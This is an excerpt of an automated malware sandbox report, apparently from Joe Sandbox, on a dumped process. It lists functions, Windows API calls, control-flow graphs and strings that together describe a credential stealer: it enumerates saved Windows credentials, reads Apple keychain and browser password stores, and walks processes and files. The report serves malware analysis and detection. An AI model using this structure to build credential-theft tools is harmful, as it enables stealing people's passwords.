                                                                                                                                                                                          • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                                                                                                                                                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                          • API String ID: 594330280-3398334509
                                                                                                                                                                                          • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                          • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 651 413e79-413e9d call 413959 call 413ca4 643->651 652 413e28-413e35 643->652 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 ??3@YAXPAX@Z 644->647 649 413edb-413ee2 646->649 647->649 657 413ee4 649->657 658 413ee7-413efe 649->658 663 413ea2-413eae CloseHandle 651->663 655 413e61-413e68 652->655 656 413e37-413e44 GetModuleHandleW 652->656 655->651 661 413e6a-413e76 655->661 656->655 660 413e46-413e5c GetProcAddress 656->660 657->658 658->639 660->655 661->651 663->642
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                                          • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                          • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                          • API String ID: 912665193-1740548384
                                                                                                                                                                                          • Opcode ID: bad4dea3beb0439734bc0ac1abfc8871ebdfa8b569daaedc40f19ab4abd0eaad
                                                                                                                                                                                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                          • Opcode Fuzzy Hash: bad4dea3beb0439734bc0ac1abfc8871ebdfa8b569daaedc40f19ab4abd0eaad
                                                                                                                                                                                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                          • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040B60D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                          • String ID: BIN
                                                                                                                                                                                          • API String ID: 1668488027-1015027815
                                                                                                                                                                                          • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406E8F Relevance: 3.4, APIs: 2, Instructions: 415COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                          • memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00407082
                                                                                                                                                                                            • Part of subcall function 004069DF: memcpy.MSVCRT ref: 004069FB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@$memcpymemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2420179184-0
                                                                                                                                                                                          • Opcode ID: 918725139429929a89f1f48b88d6c4cc4d3c3d390f69a75811133ef8db7b8cf4
                                                                                                                                                                                          • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 918725139429929a89f1f48b88d6c4cc4d3c3d390f69a75811133ef8db7b8cf4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                          • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFind$FirstNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1690352074-0
                                                                                                                                                                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoSystemmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3558857096-0
                                                                                                                                                                                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 39 44558e-445594 call 444b06 4->39 40 44557e-44558c call 4136c0 call 41366b 4->40 16 4455e5 5->16 17 4455e8-4455f9 5->17 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 19 445861-445874 call 40a889 call 403c9c 13->19 20 4458ac-4458b5 13->20 42 445823-445826 14->42 16->17 24 445672-445683 call 40a889 call 403fbe 17->24 25 4455fb-445601 17->25 50 445879-44587c 19->50 26 44594f-445958 20->26 27 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 20->27 84 445685 24->84 85 4456b2-4456b5 call 40b1ab 24->85 28 445605-445607 25->28 29 445603 25->29 35 4459f2-4459fa 26->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 26->36 135 44592d-445945 call 40b6ef 27->135 136 44594a 27->136 28->24 38 445609-44560d 28->38 29->28 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->24 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 39->3 40->39 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 50->64 65 44587e 50->65 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 73 445fae-445fb2 60->73 74 445d2b-445d3b 60->74 168 445cf5 61->168 169 445cfc-445d03 61->169 64->20 82 445884-44589d call 40a9b5 call 4087b3 65->82 138 445849 66->138 247 445c77 67->247 68->67 83 445ba2-445bcf call 4099c6 call 445403 call 445389 68->83 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->90 156 44589f 82->156 83->53 99 44568b-4456a4 call 40a9b5 call 4087b3 84->99 116 4456ba-4456c4 85->116 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 117 4457f9 116->117 118 4456ca-4456d3 call 413cfa call 413d4c 116->118 117->6 172 4456d8-4456f7 call 40b2cc call 413fa6 118->172 135->136 136->26 138->51 150->116 151->150 153->154 154->35 156->64 158->85 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->73 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                          • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                          • memset.MSVCRT ref: 00445725
                                                                                                                                                                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                            • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                            • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                                                            • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                          • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                          • memset.MSVCRT ref: 00445755
                                                                                                                                                                                          • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                          • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                          • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                          • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                          • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                          • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                          • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                          • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                          • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                          • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                          • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                          • memset.MSVCRT ref: 00445986
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                                                                                                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                          • API String ID: 2745753283-3798722523
                                                                                                                                                                                          • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041276D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 149COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                          • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                          • API String ID: 2744995895-28296030
                                                                                                                                                                                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 393 40b6ef-40b741 call 44db70 memset call 409c70 wcsrchr 398 40b743 393->398 399 40b746-40b795 memset call 40b2cc call 409d1f call 409b98 393->399 398->399 406 40b7c5-40b815 call 40bb98 memset CreateFileW 399->406 407 40b797-40b7c2 call 409c70 call 40b2cc call 409d1f 399->407 413 40b837-40b838 FindCloseChangeNotification 406->413 414 40b817-40b835 call 409a45 CopyFileW 406->414 407->406 415 40b83e-40b87f memset call 40a6e6 call 444432 413->415 414->415 425 40bad5-40badc 415->425 426 40b885-40b8ac call 40b273 call 438552 415->426 428 40baeb-40baf7 call 40b04b 425->428 429 40bade-40bae5 DeleteFileW 425->429 435 40b8b2-40b8b8 call 4251c4 426->435 436 40bacd-40bad0 call 443d90 426->436 429->428 440 40babc-40bac0 435->440 436->425 441 40bac6-40bac8 call 424f26 440->441 442 40b8bd-40b9af memset call 425413 * 5 call 4253ef call 40b64c call 40a71b * 4 call 40a734 call 4253af call 4253cf 440->442 441->436 472 40ba92-40bab2 call 4099c6 call 4099f4 442->472 473 40b9b5-40b9c9 memcmp 442->473 483 40bab4-40baba call 4251c4 472->483 474 40bafa-40bb2a call 404423 473->474 475 40b9cf-40b9d7 473->475 474->472 482 40bb30-40bb3a 474->482 475->472 477 40b9dd-40ba25 call 447280 call 447960 475->477 477->472 492 40ba27-40ba7a call 40afe8 call 447920 call 4472c0 memcmp 477->492 486 40bb3c 482->486 487 40bb3e-40bb93 memset memcpy call 40a734 LocalFree 482->487 483->440 486->487 487->472 500 40ba7c-40ba8e call 40a734 492->500 501 40ba8f 492->501 500->501 501->472
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                          • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                          • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                          • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                          • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                          • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                          • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                          • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                          • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040BB66
                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                                                                                                                                                          • String ID: chp$v10
                                                                                                                                                                                          • API String ID: 170802307-2783969131
                                                                                                                                                                                          • Opcode ID: 8dc6b8fe780278cd99cc613ec7166550d0a6417af5ac3a690e601795cd80acd7
                                                                                                                                                                                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dc6b8fe780278cd99cc613ec7166550d0a6417af5ac3a690e601795cd80acd7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
